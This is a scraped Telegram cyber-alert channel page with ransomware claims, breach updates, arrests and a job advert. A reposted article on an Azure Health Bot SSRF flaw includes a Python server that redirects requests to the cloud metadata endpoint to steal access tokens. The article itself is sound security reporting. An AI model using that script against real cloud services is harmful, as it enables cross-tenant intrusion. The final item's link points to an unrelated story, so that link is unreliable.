Hackmanac Cyber Alerts
رفتن به کانال در Telegram
🚩 Channel was restricted by Telegram
نمایش بیشتراطلاعاتی وجود ندارد
مشترکین
-624 ساعت
-567 روز
-15230 روز
آرشیو پست ها
Repost from Cyber Threat Intelligence
UK Prime Minister Keir Starmer and Prince William deepfaked in investment scam campaign
https://ift.tt/C1Kgl2y
🚨 🚨 Cyber Attack Alert 🚨🚨
🇵🇱 Poland - District Labor Office in Police
RansomHub ransomware group claims to have breached District Labor Office in Police.
The hackers allegedly exfiltrated 200 GB of data. Ransom deadline: 22nd Aug 24.
#Hackmanac #ransomware
🚨 News Alert 🚨
🔥Microsoft Fixes 9 Zero-Days on last Patch Tuesday ⤵️
https://www.infosecurity-magazine.com/news/microsoft-fixes-nine-zerodays/
#cybersecurity #zeroday #vulnerability #patchtuesday #mocrosoft
Repost from N/a
🔘 Vulnerability(cybersecuritynews.com): Critical SSRF Vulnerability in Microsoft Azure Let Hackers Compromise Health Bot Services
✉ 14.08.2024 11:34:07 Balaji N
💻 Tenable Research has uncovered significant security vulnerabilities in Microsoft’s Azure Health Bot Service, a cloud platform designed to enable healthcare professionals to deploy AI-powered virtual health assistants.
The Azure AI Health Bot Service is a cloud-based platform designed for healthcare organizations. It enables developers to create and deploy AI-driven virtual health assistants, which help streamline processes and reduce costs while ensuring compliance with industry standards.
These vulnerabilities allowed unauthorized access to cross-tenant resources, raising concerns about potential lateral movement to other resources within the service.
Tenable’s investigation focused on a feature called “Data Connections,” which allows the Azure Health Bot Service to interact with external data sources. While testing these data connections, researchers discovered a server-side request forgery (SSRF) vulnerability.
This vulnerability enabled them to bypass existing security filters and access sensitive internal endpoints, such as Azure’s Internal Metadata Service (IMDS).
Technical Analysis
The SSRF vulnerability was exploited by configuring a data connection to redirect requests to an external host controlled by the Attackers.
The host was set up to respond with a 301 redirect to the IMDS endpoint, allowing the researchers to obtain a valid metadata response. Using this response, they acquired an access token for management.azure.com and subsequently listed subscriptions and resources belonging to other customers.
The Tannable researchers employed a Python script to set up the HTTP server that facilitated the SSRF attack:
#!/usr/bin/python3
from http.server import HTTPServer, BaseHTTPRequestHandler
def servePage(s, hverb):
s.protocol_version = 'HTTP/1.1'
s.server_version = 'Microsoft-IIS/8.5'
s.sys_version = ''
s.send_response(301)
s.send_header('Location', 'http://169.254.169.254/metadata/instance?api-version=2021-12-13')
s.end_headers()
message = ""
s.wfile.write(bytes(message, "utf8"))
return
class StaticServer(BaseHTTPRequestHandler):
def do_GET(self):
servePage(self, "GET")
return
def main(server_class=HTTPServer, handler_class=StaticServer, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
httpd.serve_forever()
main()
This host was configured to respond to requests with a 301 redirect response destined for Azure’s IMDS. Using this technique, attackers could obtain ...
#Vulnerability #cyber_security #cyber_security_news #vulnerability
https://cybersecuritynews.com/critical-ssrf-vulnerability-in-microsofts-azure-health-bot-services/
read it on CSN:
https://csn.net4me.net/cyber_security_23644.html🚨 News Alert 🚨
According to the Gcore Radar Report, DDoS attacks increased by 46% in the first half of 2024 compared to last year, with significant impacts on the gaming, gambling, and IaaS industries.
Attackers appear to be using increasingly sophisticated tactics.
https://gcore.com/library/wp-security-gcore-radar-q1-2-2024
#cyberattacks #DDoS #cybersecurity #cyberthreatmonitoring
Repost from Hackmanac Cyber Alerts
Join Our Team: we are looking for a Cyber Attacks Analyst Intern!
Are you passionate about Cyber Security and eager to kickstart your career in a dynamic, fast-paced environment?
Hackmanac is looking for a motivated intern to join our Cyber Attacks Analysis team!
About Us:
- Young and dynamic UAE company
- Over 18 years of experience in Cyber Security overall
- 12+ years of expertise in Cyber Threat Monitoring
- Creative and result-oriented work environment
What We Offer:
- Hands-on training to become a skilled Cyber Attacks Analyst
- Chance to work with industry experts
- Flexible work hours and remote options
- Opportunity for growth and potential full-time employment to join our team
What We're Looking For:
- Passion and interest in Cyber Security;
- Strong desire to learn and grow professionally;
- Excellent analytical and problem-solving skills;
- Ability to work independently and as part of a team;
- Punctuality and precision;
- Good knowledge of English (written and spoken)
- Proficiency in Office applications (Excel, Word)
- No prior experience in the role required – we'll train you!
Bonus Skills:
- Knowledge of Arabic, Russian or Chinese languages is a plus.
If you're ready to dive into the exciting world of Cyber Security and build a rewarding career, we want to hear from you!
Interested candidates, please send your CV to jobs@hackmanac.com
#cybersecurityjobs #wearehiring #workwithus #joinus #cybersecurity #cyberthreatmonitoring #cyberattackanalyst
⚠️#DataBreach Update
🇦🇪LuLu - The LuLu database leak exposed 2.6 million more addresses, raising the total compromised accounts to 2,796,835, including names, physical addresses, orders, and password hashes.
To check if your email address has been compromised, we recommend using the service provided by Have I Been Pwned:
https://haveibeenpwned.com/
⚠️#DataBreach Update
🇫🇷 LDLC - The data, previously listed for sale on a popular hacking forum, included 1.27 million unique email addresses, along with names, phone numbers, and physical addresses.
https://haveibeenpwned.com/PwnedWebsites#LDLC
#CyberAttack
+1
⚠️#DataBreach Update
🇫🇷 LDLC - The data, previously listed for sale on a popular hacking forum, included 1.27 million unique email addresses, along with names, phone numbers, and physical addresses.
https://haveibeenpwned.com/PwnedWebsites#LDLC
#CyberAttack
⚠️#CyberAttack - The new hacker group Helldown wastes no time and publishes three more victims on its data leak site:
🇫🇷France: Deganis - Claim: 84 GB exfiltrated
🇩🇪Germany: Hug-Witschi - Claim: 67 GB exfiltrated
🇨🇭Switzerland: Schlattner Engineering - Claim: 53 GB exfiltrated
As with the other claims, the group provides various samples to prove the authenticity of the attack.
#Hackmanac #Ransomware
Repost from Match Systems
🔒 The 10 Best Ways to Protect Your Crypto Assets.
The Cyber Security team has already covered the first five essential ways to protect your crypto assets.
Here are five more crucial strategies to enhance your security:
1. 🌐 Check Websites and Apps.
• Carefully examine URLs, especially when entering your information on cryptocurrency exchanges and wallets.
• Avoid clicking on suspicious links in emails and messages.
2. 📈 Check Exchanges and Platforms Regularly.
• Use only reputable cryptocurrency exchanges with a solid track record.
• Stay informed by following news and security alerts related to your chosen platforms.
3. 🛜 Use a Secure Internet Connection.
• Utilize virtual private networks (VPNs) to ensure your internet connection is encrypted.
• Avoid accessing your cryptocurrency assets over public Wi-Fi networks.
4. 💻 Protect Your Computer and Devices.
• Keep your antivirus software up to date.
• Regularly update your operating systems and applications.
Avoid downloading programs from untrustworthy sources.
5. 🛡️ Accept Cryptocurrency from Verified Sources.
• Use cryptocurrency address verification services to protect yourself from receiving stolen, unauthorized, or otherwise untrustworthy cryptocurrency assets.
Repost from Cyber Security News
ℹ️ AI and Automation Are Misleading the Cybersecurity Industry
Dr. Magda Chelly, is a cyber expert educated in Paris and currently based in Singapore.
She informed LinkedIn News that there is also a misguided belief that organizations have already met their cybersecurity requirements.
"Automation and AI [artificial intelligence] are handling some cybersecurity functions, making companies believe they can manage with smaller teams," she stated.
"Furthermore, companies with well-established cybersecurity programs might assume they don't need to hire new talent, relying instead on their existing staff."
P.S. Do you agree or disagree?
Source: LinkedIn News Europe
📷 Image credit: Zibtek
@Cyber_Security_Channel
National Crime Agency (NCA) operation results in the arrest and extradition of Maksim Silnikau, a prolific Russian-speaking cybercriminal.
Silnikau, linked to ransomware and exploit kits, was arrested in Spain and extradited to the US with FBI support. His network's cybercrimes impacted millions globally.
Full article:
https://www.nationalcrimeagency.gov.uk/news/suspected-head-of-prolific-cybercrime-groups-arrested-and-extradited#:~:text=The%20NCA%20has%20been%20investigating,Service%20(USSS)%20and%20FBI.
+3
🟧 #HackTuesday 🟧
Hack Tuesday: Week 07 - 13 August 2024
🚨 97 victims by 25 hacking groups 🚨
The most active ransomware groups this week have been RansomHub and LockBit 3.0, with 17 claimed attacks each.
The most affected country is the United States, accounting for 51% of the victims, while the Professional, Scientific, and Technical sectors are the most impacted, accounting for 22% of the claimed targets, followed by the Manufacturing sector with 21% and ICT with 10%.
Overall, the claimed stolen data amounts to approximately 26.6 Terabytes.
The average #CyberRisk Factor is 3.9.
#Hackmanac #CyberAttack #HT #Cybersecurity
+3
🟧 #HackTuesday 🟧
Hack Tuesday: Week 07 - 13 August 2024
🚨 97 victims by 25 hacking groups 🚨
The most active ransomware groups this week have been RansomHub and LockBit 3.0, with 17 claimed attacks each.
The most affected country is the United States, accounting for 51% of the victims, while the Professional, Scientific, and Technical sectors are the most impacted, accounting for 22% of the claimed targets, followed by the Manufacturing sector with 21% and ICT with 10%.
Overall, the claimed stolen data amounts to approximately 26.6 Terabytes.
The average #CyberRisk Factor is 3.9.
#Hackmanac #CyberAttack #HT #Cybersecurity
🚨 Cyber Attack Alert 🚨
🇺🇸 USA - Southwest Family Medicine Associates
BianLian ransomware group claims to have breached Southwest Family Medicine Associates.
The hackers allegedly exfiltrated 400 GB of data, including HR data, patients’ and partners’ confidential data, PII and PHI data, test results and images, internal and external email correspondence, and databases.
#Hackmanac #ransomware
🚨 Cyber Attack Alert 🚨
🇿🇦 South Africa - Gauteng Partnership Fund
Dark Vault ransomware group claims to have breached Gauteng Partnership Fund, an entity wholly owned by the GP Department of Human Settlements
Ransom deadline: 20th Aug 24.
#Hackmanac #ransomware
🚨 Cyber Attack Alert 🚨
🇿🇦South Africa - Lenmed Private Hospitals
Lenmed, a private healthcare provider in South Africa, Botswana, and Mozambique, has allegedly been breached for the second time.
Following the attack claimed by LockBit on May 5th, today the Dark Vault #ransomware group also listed the hospital on its data leak site.
The deadline for the ransom payment is set for August 20th. No samples have been provided.
Regarding the previous LockBit attack, the ransom demand expired on June 5th, and as a result, 145 GB of data was leaked on the Russian cybercriminals' blog.
#Hackmanac #Cyberattack
🚨🚨New hacking group detected 🚨🚨
Helldown - 7 victims listed:
🇮🇹 Italy: Azienda Trasporti Pubblici S.p.A - Claim: 65 GB exfiltrated
🇮🇹 Italy: Albatross srl - Claim: 23 GB exfiltrated
🇵🇱 Poland: Vindix - Claim: 23 GB exfiltrated
🇵🇱 Poland: Briju - Claim: 103 GB exfiltrated
🇺🇸 USA: MyFreightWorld - Claim: 23 GB exfiltrated
🇺🇸 USA: Chesapeake Bay Maritime Museum - Claim: 65 GB exfiltrated
🇦🇹 Austria: XPERT Business Solutions - Claim: 32 GB exfiltrated
All the listed victims were posted on the group's data leak site between August 5 and August 11, and all have at least some samples to verify the authenticity of the attack.
#DataBreach #CyberAttack
#FBI Dismantles the Dispossessor Hacking Group's Operations (and Throws Some Shade)
The FBI, in collaboration with international law enforcement agencies including the U.K.'s National Crime Agency and German authorities, successfully dismantled the Dispossessor #ransomware operation.
The operation, led by a threat actor known as "Brain," targeted small to mid-sized businesses worldwide, impacting 43 victims across multiple countries including the U.S., Argentina, Australia, and Germany. The FBI seized 24 servers and 9 domains.
Dispossessor breached networks using vulnerabilities, weak passwords, and the lack of multi-factor authentication, then stole data and deployed ransomware to encrypt systems.
The group was also known for reposting data stolen by other ransomware operations like LockBit, and selling it on breach markets and hacking forums.
Full article:
https://www.bleepingcomputer.com/news/security/cisco-warns-of-nx-os-zero-day-exploited-to-deploy-custom-malware/
